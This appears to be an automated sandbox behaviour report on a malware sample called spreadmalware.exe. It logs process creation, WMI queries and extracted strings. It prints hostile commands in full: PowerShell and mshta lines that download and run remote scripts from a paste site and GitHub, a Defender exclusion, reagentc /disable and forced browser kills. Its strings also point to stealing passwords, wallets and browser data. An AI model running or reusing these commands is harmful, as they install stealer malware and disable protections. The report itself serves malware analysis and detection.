Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\9030c5d64774a9e8739e8a3ba5cc143fc2611deda0361eae0ff5109ebc17997cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\runtime.bat" "

Source: spreadmalware.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: spreadmalware.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")

Source: C:\Users\user\Desktop\spreadmalware.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\spreadmalware.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: powershell.exe, 00000029.00000002.2054332439.0000016D2B29F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2243470696.0000017533A00000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2B7E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: powershell.exe, 00000029.00000002.2054332439.0000016D2B29F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2243470696.0000017533A00000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2B7E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT fieldname, value FROM moz_formhistorySELECT UUID FROM Win32_ComputerSystemProducthttp: putIdleConn: too many idle connectionshttp2: could not negotiate protocol mutuallyhttp2: invalid Connection request header: %qhttp: Request.ContentLength=%d with nil Bodyencoding alphabet contains newline characterencoding alphabet includes duplicate symbolsreflect: funcLayout with interface receiver using value obtained using unexported fieldreflect: slice length out of range in SetLenmult128bitPow10: power of 10 is out of rangespan on userArena.faultList has invalid sizeruntime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbiddencompileCallback: float results not supportedcannot trace user goroutine on its own stackunsafe.Slice: ptr is nil and len is not zerocipher: NewGCM requires 128-bit block cipherrepeated read on failed websocket connectionunexpected argument type %q passed by sqlitetls: server's Finished message was incorrecttls: server sent an incorrect legacy versionuse of WriteTo with pre-connected connectionmime: unexpected content after media subtypecrypto/sha256: invalid hash state identifierx509: invalid RDNSequence: invalid attributex509: internal error: cannot parse domain %qcrypto/x509: error fetching intermediate: %wcrypto/sha512: invalid hash state identifierinsufficient data for calculated length typecould not write to PC specifications file: %vSOFTWARE\Microsoft\Windows\CurrentVersion\Runhttp: putIdleConn: connection is in bad statehttp: no Client.Transport or DefaultTransportinvalid request :path %q from URL.Opaque = %qnet/http: internal error: connCount underflowcannot send after transport endpoint shutdownreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexbufio.Scanner: Read returned impossible counttransitioning GC to the same state as before?produced a trigger greater than the heap goaltried to run scavenger from another goroutineruntime: failed mSpanList.remove span.npages=runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocontext: internal error: missing cancel errortls: internal error: unexpected renegotiationtls: internal error: failed to update bindersthe runtime doesn't need to give you a reasoncrypto: RegisterHash of unknown hash functioncrypto/rsa: message too long for RSA key sizex509: IP constraint contained invalid mask %xx509: certificate signed by unknown authorityzero length explicit tag was not an asn1.Flagsqlite: failed to configure mutex methods: %vparsing/packing of this section has completedcharacter string exceeds maximum length (255)math/big: cannot unmarshal %q into a *big.Intw must be at least 2
Source: powershell.exe, powershell.exe, 00000029.00000002.2054332439.0000016D2B29F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2243470696.0000017533A00000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2B7E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: powershell.exe, powershell.exe, 00000029.00000002.2054332439.0000016D2B29F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2243470696.0000017533A00000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2B7E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: powershell.exe, powershell.exe, 00000029.00000002.2054332439.0000016D2B29F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2243470696.0000017533A00000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2B7E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: spreadmalware.exe	Virustotal: Detection: 45%
Source: spreadmalware.exe	ReversingLabs: Detection: 50%

Source: powershell.exe	String found in binary or memory: pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog
Source: powershell.exe	String found in binary or memory: pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog
Source: powershell.exe	String found in binary or memory: ytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a st
Source: powershell.exe	String found in binary or memory: ytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a st
Source: powershell.exe	String found in binary or memory: ler errorSERIALNUMBERavx5124fmapsavx512bitalgIsUserAnAdminpasswords.txtdownloads.txt--stopservicestop signal: FindFirstFile relative to cryptowalletsLocal Storageexodus.walletLocal WalletsBraveSoftwareBrave-BrowserYandexBrowseraccounts.jsonmeteor-clientCheatBr

Source: unknown	Process created: C:\Users\user\Desktop\spreadmalware.exe "C:\Users\user\Desktop\spreadmalware.exe"
Source: C:\Users\user\Desktop\spreadmalware.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg \| iex"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "iwr https://pastejustit.com/raw/msdcgy3bxg \| iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\runtime.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo \\user-PC "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADDYSERVER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\doskey.exe doskey /listsize=0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') \| iex""",0)(window.close)
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') \| iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES8ECC.tmp" "c:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP"
Source: unknown	Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:createobject("wscript.shell").run("powershell iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')\|iex",0)(window.close)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')\|iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESB485.tmp" "c:\Users\user\AppData\Local\Temp\c2ejd4wa\CSC99BE4B68E03746B880F950F6606729FB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disable
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
